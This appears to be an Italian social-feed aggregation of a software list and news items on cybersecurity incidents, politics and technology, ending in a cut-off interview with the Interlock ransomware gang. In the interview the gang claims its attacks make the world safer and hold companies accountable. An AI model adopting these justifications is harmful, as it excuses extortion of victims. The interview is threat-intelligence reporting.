Elenco software installato
L'idea di Quintarelli @quinta :ubuntu: di proporre il software installato sui propri dispositivi mi e' tornata utile, spero torni utile la mia.
Mobile Android
Calendario: Etar
Mail: K-9, Thunderbird
Task&Note: OpenTask, JTX Board
SMS: QKSMS
Contatti: Simple Contact Pro
Bookmark sync: XBrowserSync, Floocus, Firefox
Home automation client: HomeAssistant client, Home bridge client
App store: Aurora store, App Lounge, F-Droid, GPlay
Audio&Videoconferenze: Teams, Google chat
Galleria Foto: Aves Libre
Grafica: Linwood Butterfly Nightly (disegno mano libera)
Browser: Firefox e Focus , Kiwi Browser, LibreWolf, DuckDuckGo, Bromite
Motore ricerca: DuckDuckGo, Qwant
Meteo: MeteoAM, Weawow, Breezy weather
Chat: Element, Deltachat, Fluffychat, WA
Cloud: Infomaniak Kdrive, Webdav, Nextcloud e/os
File manager: Material File
Identità digitale: Spid
Condivisione file local network: Warpinator , KDE connect
Mappe: GMaps, Organic Maps
Editor OSM : Vespucci
Fediverso: Racoon, Phanpy, Browser
VideoMusic&Radio streaming: VLC, Radiodroid
Navigatore: Waze, MagicEarth, GMaps
Desktop remoto: NoMachine (client)
2FA authenticator: Aegis, Google Authenticator, Fortitoken, Bitwarden
Password Manager: Keepass2Android, Nextcloud password
Ebook/PDF reader: Librera FD
News: Flym (era un bel reader RSS ormai archiviato)
Podcast: AntennaPod
QR Code reader: QR Scanner
Sincronizzatore CalDav/CardDAV: DAVx5
Tastiere: HeliBoard
Tool di rete: LTE Discovery, ConnectBot (ssh), Duorem (wakeOnLan)
VPN: OpenVPN, Netbird, Forticlient
Altro : BatteryBot
Personal Computer
Hardware: MinisForum
OS: LinuMint 22 Cinnamon
Backup: Backup Tool, TimeShift, rsync locale, Foxclone, CloneZilla
Browsers: Librewolf, Firefox
Chat: WA
Grafica: XnView MP
Mail/calendar/contacts: Thunderbird
VideoMusic&Radio streaming: VLC
Office: Libre Office
Password manager: KeepassXC, Nextcloud password
Cloud: Infomaniak Kdrive, Webdav, Nextcloud e/os
VPN: OpenVPN, Netbird, Forticlient
Desktop remoto: Remmina, NoMachine (server/client)
Rasperry 4: Home Assistant server
Server remoto
Hosting dirtynello.it su SupportHost: Mail (smtp, imap) Caldav, Carddav, Webdav,
Blog: WordPress
Forum: Php Forum
Foto: Pwigo
Server locale: Notebook Fujitszu Core 2 P8400
OS: Ubuntu server 22.04
Streaming Audio&Video: Minidlna
File system share: NFS
Home Automation: HomeBridge
Desktop remoto: Remmina, NoMachine (server/client)
Varie: AMule, Devolo, Virtualbox, LuckyBackup
VPN: OpenVPN, Netbird
Estensioni Browser: Floccus, KeepasXC, Keepa, Tranquility Reader, uBlock Origin, Ghost, Nextcloud password
quinta - Stefano Quintarelli reshared this.
Resilienza cognitiva: Il segreto per proteggere la tua mente nel caos digitale
La resilienza cognitiva e la cybersecurity condividono un legame cruciale nell’era digitale, dove le minacce informatiche non colpiscono solo sistemi tecnologici, ma anche la mente umana. La resilienza cognitiva, ovvero la capacità di mantenere calma e lucidità di fronte a situazioni critiche, è fondamentale per contrastare attacchi come il phishing, il social engineering e la disinformazione.
Gli hacker criminali, infatti, sfruttano le vulnerabilità psicologiche, inducendo le persone a compiere azioni dannose, come cliccare su link malevoli o fornire informazioni sensibili. Allenare la propria resilienza cognitiva significa sviluppare una mentalità critica, riconoscere segnali di manipolazione e reagire con decisione. In un mondo dove il fattore umano è spesso l’anello debole della sicurezza, una mente resiliente diventa una difesa indispensabile, al pari dei firewall e degli antivirus.
Cos’è la Resilienza Cognitiva
La resilienza cognitiva è una capacità cruciale per mantenere la lucidità e la stabilità mentale in un mondo sempre più complesso e manipolativo. La rivista Defense Horizon Magazine ha analizzato come sviluppare questa competenza, paragonandola a una sorta di “manovra di Heimlich” per la mente. Così come la manovra salva vite in caso di soffocamento, la resilienza cognitiva ci permette di riconoscere e respingere influenze negative, recuperando controllo sulle nostre decisioni e reazioni.
L’articolo sottolinea l’importanza di allenare la mente a individuare manipolazioni psicologiche che possono derivare da propaganda, fake news o pressioni sociali. Essere consapevoli di come funziona il cervello di fronte a stimoli esterni ci rende meno vulnerabili. Lo scopo è acquisire una visione critica che ci aiuti a separare i fatti dalle distorsioni e a rispondere razionalmente anziché emotivamente.
Un altro aspetto centrale è la gestione delle emozioni, elemento chiave per migliorare la resilienza. Secondo gli esperti, pratiche come la mindfulness, l’autocontrollo e il riconoscimento delle proprie fragilità emotive sono fondamentali per mantenere l’equilibrio mentale.
Questi strumenti non solo proteggono dall’influenza di terzi, ma aiutano anche a mantenere una salute psicologica stabile, indispensabile in situazioni di stress o crisi.
Tra Fake News e Sicurezza Informatica
Il contesto tecnologico attuale amplifica il bisogno di resilienza cognitiva. Con l’esplosione di notizie false e la diffusione di contenuti polarizzanti sui social media, diventa essenziale affinare le abilità di verifica delle informazioni. Non si tratta solo di analizzare dati oggettivi, ma di sviluppare un’intuizione che aiuti a filtrare messaggi manipolativi in tempo reale.
La resilienza cognitiva è inoltre strettamente collegata alla capacità di agire in modo proattivo e autonomo, senza farsi sopraffare da influenze esterne. Saper prendere decisioni basate su valori e priorità personali è un’abilità che può fare la differenza in contesti personali e professionali. Questo aspetto è cruciale per chiunque voglia navigare le complessità della società moderna con consapevolezza e fiducia in se stesso.
L’articolo si conclude enfatizzando l’importanza di considerare la resilienza cognitiva come una competenza che si può apprendere e migliorare. Grazie a esercizi specifici e un costante lavoro su se stessi, è possibile costruire una “mente forte” che ci protegge da manipolazioni, stress e incertezze, permettendoci di vivere in modo più autentico e sereno.
L'articolo Resilienza cognitiva: Il segreto per proteggere la tua mente nel caos digitale proviene da il blog della sicurezza informatica.
L’inchiesta della tv albanese sui poliziotti italiani a Shengjin: “Ci pagano per fare i turisti” | VIDEO
@Politica interna, europea e internazionale
L’inchiesta della tv albanese sui poliziotti italiani a Shengjin | VIDEO La trasmissione albanese Piranjat ha documentato, attraverso le telecamere nascoste, il soggiorno di alcuni agenti di polizia in servizio a Shengjin, la cittadina dove è stato costruito
Robot Rodents: How AI Learned to Squeak and Play
In an astonishing blend of robotics and nature, SMEO—a robot rat designed by researchers in China and Germany — is fooling real rats into treating it like one of their own.
What sets SMEO apart is its rat-like adaptability. Equipped with a flexible spine, realistic forelimbs, and AI-driven behavior patterns, it doesn’t just mimic a rat — it learns and evolves through interaction. Researchers used video data to train SMEO to “think” like a rat, convincing its living counterparts to play, cower, or even engage in social nuzzling. This degree of mimicry could make SMEO a valuable tool for studying animal behavior ethically, minimizing stress on live animals by replacing some real-world interactions.
For builders and robotics enthusiasts, SMEO is a reminder that robotics can push boundaries while fostering a more compassionate future. Many have reservations about keeping intelligent creatures in confined cages or using them in experiments, so imagine applying this tech to non-invasive studies or even wildlife conservation. In a world where robotic dogs, bees, and even schools of fish have come to life, this animatronic rat sounds like an addition worth further exploring. SMEO’s development could, ironically, pave the way for reducing reliance on animal testing.
youtube.com/embed/WJr3ZDmLk_s?…
Sicurezza Nazionale o Nulla! Gli USA Dichiarano Guerra a Huawei e ZTE
Questa settimana la Camera dei Rappresentanti degli Stati Uniti voterà un disegno di legge sulla difesa che prevede finanziamenti per oltre 3 miliardi di dollari per sostituire le apparecchiature delle società di telecomunicazioni cinesi Huawei e ZTE nelle reti wireless americane. Questa misura è volta ad eliminare le minacce alla sicurezza nazionale.
Il documento di 1.800 pagine include anche ulteriori iniziative legate alla Cina, come un rapporto sui tentativi delle aziende cinesi di eludere le normative statunitensi e un’analisi delle capacità biotecnologiche della Cina.
Secondo la Federal Communications Commission (FCC), sono necessari 4,98 miliardi di dollari per rimuovere e sostituire le apparecchiature non sicure, ma il Congresso ha precedentemente stanziato solo 1,9 miliardi di dollari. La nuova iniziativa dovrebbe compensare la mancanza di finanziamenti.
La scorsa settimana la presidente della FCC Jessica Rosenworcel ha chiesto al Congresso fondi aggiuntivi, sottolineando che il deficit di 3,08 miliardi di dollari minaccia la sicurezza nazionale e potrebbe lasciare i residenti rurali senza comunicazioni. In alcune regioni, ciò potrebbe portare alla chiusura di un unico operatore e creare un rischio per il servizio di emergenza.
Il programma “rimuovi e sostituisci” per le apparecchiature cinesi è iniziato nel 2019. Successivamente il Congresso ha ordinato alla FCC di garantire che le reti di operatori che ricevono sussidi federali fossero ripulite. La Casa Bianca ha richiesto ulteriori 3,1 miliardi di dollari nel 2023 per completare il progetto.
La senatrice Maria Cantwell ha osservato che i finanziamenti per il programma, nonché fino a 500 milioni di dollari per gli hub tecnologici regionali, saranno coperti attraverso una vendita una tantum dello spettro AWS-3 per le tecnologie wireless.
Tim Donovan, CEO della Competitive Carriers Association, ha espresso sostegno al piano, affermando che il finanziamento è necessario per soddisfare il mandato di sostituzione delle apparecchiature garantendo al tempo stesso la connettività a milioni di americani.
La competizione tecnologica tra i paesi si sta trasformando sempre più in un conflitto, in cui la protezione degli interessi nazionali si misura non solo con la potenza militare, ma anche con la capacità di controllare le comunicazioni di informazione.
In questa nuova realtà digitale, l’infrastruttura delle telecomunicazioni diventa non solo un mezzo di comunicazione, ma un asset strategico da cui dipende non solo la sicurezza economica, ma anche la sovranità dello Stato.
L'articolo Sicurezza Nazionale o Nulla! Gli USA Dichiarano Guerra a Huawei e ZTE proviene da il blog della sicurezza informatica.
La commissaria Virkkunen sostiene il consolidamento delle telecomunicazioni UE, ma alcuni Stati membri si oppongono
L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
La vicepresidente esecutiva della Commissione europea responsabile della sovranità
Il proporzionale: gli anticorpi all’estremismo
@Politica interna, europea e internazionale
L'articolo Il proporzionale: gli anticorpi all’estremismo proviene da Fondazione Luigi Einaudi.
digiter likes this.
reshared this
Consultazione M5S, la base conferma la decisione: “Addio Beppe Grillo”. Conte: “Ora si volta pagina”
@Politica interna, europea e internazionale
Ormai non ci sono più dubbi: il Movimento 5 Stelle ripudia il suo Garante e co-fondatore Beppe Grillo e decide di proseguire sulla strada tracciata dal presidente Giuseppe Conte. Dopo il verdetto già emerso
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.
Ministero dell'Istruzione
#NotiziePerLaScuola È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.Telegram
Story of the Year: global IT outages and supply chain attacks
A faulty update by cybersecurity firm CrowdStrike triggered one of the largest IT outages in history, impacting approximately 8.5 million systems worldwide. This incident serves as a stark reminder of the critical risks posed by global IT disruptions and supply chain weaknesses. With large-scale security crises being one of the most relevant threats worldwide, it’s more important than ever to reflect on past events, assess emerging threats, and, most crucially, explore strategies to prevent future incidents.
As part of Kaspersky Security Bulletin 2024, our “Story of the Year” centers on these pressing issues. We’ll begin by revisiting notable supply chain incidents from 2024, and then explore potential scenarios of more damaging cases and the ways we prepare for them.
Let’s dive in!
Overview of 2024’s supply chain disruptions
CrowdStrike Linux outage
What happened? Just weeks before the Windows incident, CrowdStrike encountered issues with Linux. A software update in April caused problems in a number of distributions, such as Red Hat, Debian and Rocky.
Why does it matter? Linux is the operating system used by many key infrastructure and security facilities. A previous faulty update had already suggested broader problems with CrowdStrike’s security software at the time, though the problem didn’t receive that much publicity.
XZ backdoor to bypass SSH authentication
What happened? In March, the Opensource Software Security project by Openwall (oss-security) reported a backdoor in XZ, a compression utility and popular code library widely used in Linux distributions. Unlike past supply chain attacks on Node.js, PyPI, FDroid and the Linux kernel, which relied on small malicious injections or fake package delivery resulting from supply chain abuse, this was a multi-stage attack that nearly compromised possibly millions or at least hundreds of thousands of SSH servers globally, with attackers employing social engineering tactics and even creating fake community members to win the trust of the XZ Utils maintainer. Kaspersky presented detailed technical analysis of this case in three parts. Kaspersky products detect malicious objects related to the attack.
Why does it matter? As a result of these tactics, attackers covertly implanted the backdoor. This case underscores the serious risk that social engineering and supply chain attacks pose to open-source projects. It emphasizes the importance of implementing stricter security measures, adopting a more vigilant approach to project management, and maintaining careful oversight in regard to projects’ contributors.
Pager attack in Middle East
What happened? Recent incidents in the Middle East involving pagers have illustrated the risks associated with hardware supply chain attacks. A targeted attack exploited a batch of pagers used by Hezbollah, causing widespread chaos and casualties. Media sources reported that explosives had been concealed within the devices.
Why does it matter? This incident demonstrates the possibility of attacks being conducted to cause physical harm, and various threat actors may be leveraging electronic or fully digital components. The infamous Stuxnet attack serves as a stark reminder of this potential. By targeting industrial control systems, Stuxnet demonstrated how a cyberweapon could inflict tangible, real-world damage, underscoring the critical need for vigilance against such threats in both hardware and software systems.
JavaScript abuse leading to major corporations’ websites being compromised
What happened? Around 385,000 websites using Polyfill.io, a piece of remotely hosted programming code, fell victim to a massive supply chain attack when, after the acquisition of the polyfill.io domain, the loaded script was altered to redirect users to malicious and fraudulent sites. The Polyfill.io service provides support and functionality missing in older versions of web browsers. It enables developers to use modern tools even if they are not supported by a particular browser version. As of July 2024, affected hosts included websites associated with major platforms like Warner Bros, Hulu and Mercedes-Benz.
Why does it matter? According to Cloudflare, Polyfill.io was used by tens of millions of websites — approximately 4% of all sites on the internet — which highlights the severity of the incident, whose full impact is yet to be determined.
Cisco Duo supply chain data breach
What happened? No corporation is immune to the threat of supply chain attacks. User data was stolen from Cisco Duo, a service that provides organizations with multi-factor authentication (MFA) and single sign-on (SSO) network access, as a consequence of a phishing attack targeting an employee of a third-party telephony provider. The breach allowed the threat actor to download SMS message logs.
Why does it matter? This incident highlighted the risks of attacks where third-party service providers become the entry point. IT outsourcing is growing in popularity, offering benefits such as time and resource savings. However, delegating tasks also introduces new information security challenges. In 2023, cyberattacks using trusted relationships had already become one of the top three most common vectors, with this trend gaining new momentum in 2024.
“regreSSHion” vulnerability in OpenSSH
What happened? A critical vulnerability, named “regreSSHion“, was discovered in OpenSSH earlier this year. OpenSSH is used in a wide range of scenarios where secure network communication is required. It is a critical tool in various fields, including system administration, development, and cybersecurity. The SSH protocol is used by companies across all industries, potentially allowing perpetrators to execute malicious code and gain root privileges.
Why does it matter? Exploiting this vulnerability on a massive scale is improbable due to the significant computational power requirements — as it relies on a race condition, attackers would need to make multiple authentication attempts on the target server. According to Qualys, 10,000 attempts are needed for a successful exploitation which may take from several hours to several days, depending on the target OpenSSH server configuration. However, targeted attacks remain a viable possibility. The issue serves as a reminder of the potential risks inherent in widely used software.
Fortinet firewall vulnerabilities
What happened? In October 2024, critical CVEs in four Fortinet products were reported to be actively exploited. Researchers said over 87,000 Fortinet IPs were likely affected by one of the identified vulnerabilities at the time. This information was disseminated, making the vulnerable systems high-visibility targets for threat actors, especially as Fortinet products are commonly found in government, healthcare, and other critical sectors.
Why does it matter? Fortinet products are integral to many organizations’ network security. When critical vulnerabilities in such widely deployed products are exploited, it opens a pathway for attackers to breach the security of multiple organizations through a single vendor’s software or appliances.
Other notable supply chain attacks in 2024 include:
- Hackers injected malware directly into the source code of the largest Discord bot platform.
- Attackers attempted to upload hundreds of malicious packages to PyPI, using names that mimicked legitimate projects.
- Another set of malicious packages was found in the PyPI repository. The packages imitated libraries for LLMs, whereas in fact they downloaded the JarkaStealer malware to the victim’s system.
- A threat actor gained control over the Tornado Cash crypto mixer.
Beyond 2024’s supply chain incidents: exploring even greater risk scenarios
The incidents covered above prompt a critical question: what kind of scenarios could lead to more devastating consequences? In the following section, we’ll delve into potential global disruptions.
A major AI provider failure
AI dominated our “Story of the Year 2023” as the adoption of generative tools has already influenced nearly every aspect of our lives back then. This year, the trend deepens with AI being officially integrated with services used by millions. Consider OpenAI, with technologies that are used in a wide range of assistants, from Apple and GitHub Copilot to Morgan Stanley‘s proprietary tools. Businesses also rely on models from Meta (Llama), Anthropic (Claude), and Google (Gemini). On the one hand, this transformation enhances daily experiences, but on the other, it heightens the risks associated with the dependence on few key providers. In fact, this trend creates concentrated points of failure: if one of the major AI companies experiences a critical disruption, it could significantly impact dozens, hundreds or even thousands of services depending on it. In a worst-case scenario, a breakdown in these services could mean widespread operational failures across industries.
Another threat that looms large is data breaches. An incident at any major AI provider could lead to one of the most extensive leaks, as AI-powering systems often gather and store a vast amount of sensitive information. While AI chatbot accounts are already being traded on the dark web as a result of malware activity targeting individuals, an AI provider storage breach affecting clients at the corporate level could result in the compromise of even more sensitive data.
Businesses adopting AI should consider vendor diversification, as well as prioritize infrastructure resilience, careful configuration of access restrictions for integrated AI components, and watch closely, as they normally do, any personnel handling sensitive data. Data breaches might not always stem from external cyberattacks; they could be orchestrated by careless or determined insiders who may leverage AI as a tool for data theft.
Exploitation of on-device AI tools
AI integration is accelerating across both consumer-facing and business-oriented gadgets and tools. For example, Apple Intelligence was recently rolled out in beta for the users of its latest systems. This functionality is powered largely by neural cores, or a “Neural Engine“. These engines, and on-device AI in general, provide a genuinely new experience, optimized for running large language models in everyday tasks.
However, with great user experience come great cyber-risks, and as AI becomes more widespread, the likelihood of it being chosen as an attack vector increases. In the Triangulation campaign, discovered by Kaspersky last year, attackers compromised the integrity of system software and hardware by exploiting zero-day vulnerabilities to load advanced spyware onto devices. Similar software or hardware-assisted vulnerabilities in neural processing units, if they exist, could extend or present an even more dangerous attack vector. In such a scenario, attackers wouldn’t just gain access to the information stored on the targeted device — they could also extract contextual data from AI utilities, enabling them to construct highly detailed profiles of their victims and upscale the potential damage.
Our research into Operation Triangulation also revealed the first of its kind case reported by Kaspersky — the misuse of on-device machine learning for data extraction, highlighting that features designed to enhance user experience can also be weaponized by sophisticated threat actors.
These risks underscore the importance of proactive measures for vendors, like conducting security research and rigorous testing, to build stronger defenses against emerging threats.
Cyberattacks on communications satellites
Satellites play a critical role in everyday life, supporting navigation, media broadcasting, emergency response, communication infrastructure and many other services, though their presence often goes unnoticed by ordinary people. As our reliance on satellite-based technologies increases, these systems are becoming attractive targets for threat actors. In 2024, for instance, an APT actor targeted the space industry with backdoors. In another case, an actor reportedly caused satellite-related issues to Finnish utility Fortum.
While these incidents did not lead to severe global disruptions, they highlight the growing risks for satellite infrastructure. A potentially more impactful threat lies in the satellite internet access supply chain. For example, consider Starlink and Viasat — these companies offer high-speed satellite internet connectivity globally, especially in remote areas. At the same time, traditional internet service providers tend to partner with satellite-based ones to extend their reach, which could be a fertile field for malicious campaigns.
Satellite internet access is an important component of the global connectivity chain. It can provide temporary communication links when other systems are down; airlines, ships, and other moving platforms rely on it to provide onboard connectivity and more. Here come cyber-risks: a targeted cyberattack or a faulty update from a leading or dominant satellite provider could cause internet outages and potential communication breakdowns, impacting individuals, businesses and critical infrastructure.
Physical threats to the internet
Following connectivity, the internet is also vulnerable to physical threats. While satellites are rapidly advancing as a means of communication, 95% of international data is transmitted through subsea cables. There are roughly 600 such cables in operation globally, varying in quality and capacity. In addition to these cables, the internet relies on nearly 1,500 Internet Exchange Points (IXPs), which are physical locations, sometimes within data centers, where different networks exchange traffic.
A disruption to just a few critical components of this chain, such as cables or IXPs, could overload the remaining infrastructure, potentially causing widespread outages and significantly impacting global connectivity. The world has already witnessed instances of such disruptions. For example, in a recent case, two undersea cables in the Baltic Sea were reported to be affected, which is further proof that the importance of physical security, including the protection of hardware, continues to grow as a critical concern for the coming years.
Kernel exploitation in Windows and Linux
The two major operating systems power many of the world’s critical assets, including servers, manufacturing equipment, logistics systems and IoT devices. A kernel vulnerability in each of these operating systems could expose countless devices and networks worldwide to potential attacks. For example, in 2024, several kernel vulnerabilities were reported, such as the Linux kernel privilege escalation vulnerability. On the Windows side, in 2024 Microsoft disclosed the CVE-2024-21338, which was a new “admin to kernel” elevation-of-privileges vulnerability used in the wild.
Such vulnerabilities create a high-risk situation where global supply chains could face significant disruptions. These risks underscore the importance of vigilant cybersecurity practices, prompt patching and secure configurations to safeguard the supply chain continuity.
Last but not least: how the risks associated with supply chains could be mitigated
While the scenarios and cases described above may seem alarming, awareness is the first step towards preventing such attacks and mitigating their consequences. Despite the diverse nature of supply chain risks, they can be addressed through several unified strategies. These require a multifaceted approach that combines technological, organizational and workplace cultural measures.
From a security standpoint, regular updates should be rigorously tested before deployment, and vendors must adopt the principle of granular updates to minimize disruptions. AI-driven anomaly detection can enhance human review by reducing alert fatigue. On the user side, patch management and timely updates are vital to maintaining a secure environment.
From a resilience perspective, diversifying providers reduces single points of failure, enhancing the system’s robustness. Equally critical is fostering a culture of responsibility and integrity among personnel, as human vigilance remains a cornerstone of security and stability.
Together, these measures form a strong framework to enhance supply chain resilience, safeguard against potential disruptions, and guide global systems and economies toward a brighter, safer future.
La Rivincita dei Codici QR: Non Solo per il Menù del Ristorante
Gli esperti di Mandiant hanno scoperto un nuovo metodo per aggirare le tecnologie di isolamento del browser che consente agli aggressori di organizzare le comunicazioni C2 utilizzando i codici QR. Questa scoperta dimostra levulnerabilità nei moderni sistemi di sicurezza dei browser.
La tecnologia di isolamento del browser è progettata per migliorare la sicurezza instradando tutte le richieste del browser locale su browser remoti in esecuzione nel cloud o in macchine virtuali. Qualsiasi codice sui siti visitati viene eseguito da remoto e solo l’immagine visiva della pagina viene trasferita al dispositivo locale.
Tuttavia, Mandiant ha trovato un modo per aggirare questa protezione. Il nuovo metodo utilizza i codici QR per trasmettere comandi. La visualizzazione visiva di un codice QR su una pagina aggira l’isolamento del browser, consentendo al malware presente sul dispositivo infetto di leggerne e decodificarne il contenuto.
L’esperimento Mandiant ha mostrato un riuscito bypass della protezione sulla versione attuale di Google Chrome. I ricercatori hanno utilizzato Cobalt Strike, un popolare strumento di test di penetrazione, per eseguire questo attacco.
Tuttavia, il metodo ha i suoi limiti. Innanzitutto, la dimensione dei dati trasmessi tramite codici QR è limitata a 2.189 byte, il che rende difficile la trasmissione di grandi quantità di informazioni. In secondo luogo, l’elevato ritardo tra le richieste rende il metodo lento: circa 438 byte al secondo. Ciò rende la tecnica inadatta ad attacchi su larga scala come il proxy SOCKS.
Inoltre, Mandiant sottolinea che ulteriori misure di sicurezza come il controllo della reputazione del dominio, la scansione degli URL e la prevenzione della fuga di dati potrebbero bloccare questo metodo.
Tuttavia, nonostante una serie di restrizioni, la minaccia rimane reale.
Gli amministratori dei sistemi critici sono incoraggiati a monitorare attentamente il traffico anomalo e a utilizzare meccanismi di protezione per rilevare i browser automatizzati sulla rete.
L'articolo La Rivincita dei Codici QR: Non Solo per il Menù del Ristorante proviene da il blog della sicurezza informatica.
Debugging the UE1 Paper Tape Reader and Amplification Circuit
The tape reader and amplifiers mounted with the other UE1 modules. (Credit: David Lovett, YouTube)
After recently putting together the paper tape reader for his custom tube-based UE1 computer, [David Lovett] did get squiggles on the outputs, but not quite the right ones. In the most recent video, these issues are addressed one by one, so that this part of the UE1 1-bit computer can be called ‘done’. Starting off the list of issues were the odd readings from the photodiodes, which turned out to be due to the diodes being misaligned and a dodgy solder joint. This allowed [David] to move on to building the (obviously 6AU6 tube-based) amplifier for the photodiode output signals.
Much like the Bendix G-15’s tape reader which served as inspiration, this also meant adding potentiometers to adjust the gain. For the clock signal on the tape, a clock recovery PCB was needed, which should provide the UE1 computer system with both the clocks and the input data.
Using the potentiometers on the amplification board, the output signals can be adjusted at will to give the cleanest possible signal to the rest of the system, which theoretically means that as soon as [David] adds the permanent wiring and a few utility boards to allow the code to manipulate the tape reader (e.g. halt) as well as manual inputs. The UE1 computer system is thus being pretty close to running off tape by itself for the first time and with it being ‘complete’.
youtube.com/embed/H8X5wpxXAeI?…
Gli Usa a Kiev: “al fronte i 18enni”. Ma è boom di diserzioni
@Notizie dall'Italia e dal mondo
Zelenskyi rifiuta di abbassare l'età della coscrizione come suggerito da Usa e Nato, ma il numero record di diserzioni sguarnisce il fronte
L'articolo Gli Usa a Kiev: “al fronte i 18enni”. Ma è boom di diserzioni proviene da Pagine Esteri.
Microsoft lancia l’allarme: Storm-0227 contro infrastrutture critiche USA
Microsoft riferisce che il 5 dicembre il gruppo di hacker cinese Storm-0227 ha iniziato ad attaccare infrastrutture critiche e agenzie governative statunitensi. Gli hacker sono attivi da gennaio e rimangono attivi fino ad oggi.
Le attività di Storm-0227 si sovrappongono a quelle di altri gruppi di spionaggio cinesi come Silk Typhoon (Hafnium) e TAG-100. Negli ultimi 12 mesi, le organizzazioni statunitensi sono diventate obiettivi importanti, tra cui le industrie della difesa, le compagnie aeree, le società di telecomunicazioni, i settori finanziario e legale, nonché le agenzie governative e le organizzazioni no-profit.
Storm-0227 sfrutta le vulnerabilità note delle applicazioni Web e le e-mail di phishing con allegati o collegamenti dannosi. Da settembre, gli aggressori distribuiscono attivamente SparkRAT, uno strumento di amministrazione remota open sourceche consente l’accesso permanente ai sistemi delle vittime. È interessante notare che il gruppo non sviluppa malware propri, ma utilizza soluzioni disponibili sul mercato.
A seguito della violazione, i criminali informatici rubano le credenziali per i servizi cloud, tra cui Microsoft 365 ed eDiscovery. Lavorare con applicazioni legittime consente di nasconderti dal rilevamento mascherandoti da utenti normali. L’obiettivo principale degli attacchi è ottenere informazioni riservate, comprese e-mail e file associati. Gli analisti affermano che tali dati aiutano gli hacker a comprendere meglio le operazioni delle vittime.
Le vittime di Storm-0227 si sovrappongono a settori che sono stati attaccati da altri gruppi di hacker cinesi, Salt Typhoon (specializzato in telecomunicazioni) e Volt Typhoon. Gli esperti avvertono che l’attività del gruppo continuerà mentre la Cina si concentra sulla raccolta di informazioni di interesse per la sicurezza nazionale.
Microsoft sottolinea che le spie informatiche continuano a estrarre file per scopi di intelligence, compresi i dati contestuali dalle comunicazioni. L’attenzione principale rimane sugli interessi americani e sulle risorse strategiche.
L'articolo Microsoft lancia l’allarme: Storm-0227 contro infrastrutture critiche USA proviene da il blog della sicurezza informatica.
RHC DarkLab Intervista Interlock Ransomware. “Non sprecare energie e tempo. Lo faremo noi per te!”
RHC DarkLab ha sempre adottato un approccio unico e provocatorio nella lotta contro le minacce cyber, sintetizzato dal motto: “Occorre conoscere i Demoni per imparare a contrastarli.” Questa filosofia guida il nostro impegno costante nel comprendere i Threat Actors attraverso interviste dirette, per esporre le loro tecniche, tattiche e procedure (TTPs) e migliorare le difese di chi si trova a fronteggiare questi avversari insidiosi.
Le cyber gang, come Interlock, si presentano spesso con un mix di motivazioni e abilità altamente sofisticate, come dimostrato dai recenti attacchi che hanno preso di mira sistemi apparentemente sicuri come FreeBSD. In molti casi, dichiarano di agire per colmare le lacune lasciate dalle organizzazioni bersaglio, come se fosse una sorta di giustizia cyber, ma dietro queste dichiarazioni si nascondono moventi puramente finanziari o ideologici. Questi attacchi non solo minacciano la stabilità delle infrastrutture digitali, ma sottolineano il crescente bisogno di una comprensione più profonda delle strategie adottate dai criminali informatici.
Home Page del Data leak Site (DLS) di Interlock Ransomware
Le nostre interviste con i Threat Actors, come Vanir Group o Ransomcortex, mostrano la diversità di approcci e motivazioni che alimentano le operazioni di ransomware. Dalla semplice avidità alle complesse reti di collaborazioni, ogni gruppo opera con regole e obiettivi specifici, spesso dettati da opportunità economiche o da considerazioni geopolitiche. Questo dialogo, sebbene controverso, permette di rivelare dettagli critici sul funzionamento interno delle organizzazioni criminali, offrendo agli esperti di sicurezza un vantaggio nella loro lotta contro queste minacce.
Nel caso di Interlock, le dichiarazioni come “Se non prendete sul serio la sicurezza, lo faremo noi per voi” enfatizzano un atteggiamento provocatorio e un intento di mettere in luce la vulnerabilità delle aziende. È fondamentale analizzare queste affermazioni non solo per capire le loro tattiche, ma anche per anticipare e prevenire future campagne di attacco. Attraverso queste interviste, RHC DarkLab offre una finestra su un mondo oscuro e complesso, unendo rigore investigativo e una profonda conoscenza tecnica. Questo ci consente di costruire una narrativa solida e utile, che informa non solo i professionisti della sicurezza, ma anche il pubblico più ampio, aumentando la consapevolezza collettiva.
Di seguito, presentiamo l’intervista esclusiva con la cyber gang Interlock, un ulteriore tassello nel nostro impegno per svelare i segreti dei “Demoni digitali” e contrastarne l’impatto devastante.
Sezione “About Us” presente all’interno del Data leak Site (DLS) di Interlock
1 – RHC: Grazie ragazzi per aver accettato questa intervista. Siete un gruppo che è apparso di recente nell’underground, potete raccontarci come e quando è nato il gruppo Interlock e perché la scelta di questo nome? Inoltre, congratulazioni per il sito, è davvero bello!
Interlock: Interlocker è stato creato nel 2024. Il nome deriva da “International Locker”.
2 – RHC: Nel vostro manifesto affermate di voler “imporre responsabilità” alle aziende negligenti. Cosa vi ha spinto a scegliere questo approccio e quali valori vi guidano come collettivo?
Interlock: Ogni virus è un passo verso l’evoluzione. Le nostre attività spingono il settore della sicurezza informatica a evolversi e migliorare le tecnologie.
3 – RHC: Sostenete di essere un “campanello d’allarme” per la negligenza aziendale. In che misura pensate che le aziende siano realmente consapevoli del rischio di attacchi ransomware e perché pensate che molte continuino a ignorarlo?
Interlock: Le aziende che ignorano i potenziali attacchi sottovalutano gravemente i rischi nella loro ricerca del massimo profitto. Raccolgono NPI (Informazioni non pubbliche), le analizzano in modo efficace e bombardano gli utenti con annunci mirati per aumentare i ricavi. Eppure dimenticano la loro responsabilità per i dati che raccolgono. Siamo qui per ricordare loro questa responsabilità.
4 – RHC: Molte cybergang affermano di agire per amore della giustizia, ma la percezione pubblica è spesso diversa. Come vorresti che fossero interpretate le vostre azioni? E come rispondete a coloro che vi considerano semplicemente dei criminali?
Interlock: L’opinione pubblica si basa spesso su idee sbagliate. Molte aziende sfruttano la mancanza di comprensione del pubblico e lo ingannano intenzionalmente. Affermano di raccogliere informazioni anonime, ma in realtà utilizzano grandi set di dati per creare profili dettagliati, formando bolle pubblicitarie per manipolarti e farti credere che desideri i loro prodotti. Questa tecnologia è troppo complessa perché il cittadino medio possa comprenderla.
5 – RHC: Siete entrati di recente nel mondo del cybercrime. Quali sono i vostri obiettivi e la vostra propensione? Divenire un prezioso RaaS o operare in proprio? Avete attualmente un programma di affiliazione? Come sta andando l’attività?
Interlock: Il nostro obiettivo è rendere il mondo un po’ più sicuro di prima.
6 – RHC: Al netto delle aziende presenti sul vostro Data leak Site (DLS), che attualmente sono 6, quante aziende avete hackerato in totale e quanto è il riscatto medio che siete riusciti ad estorcere?
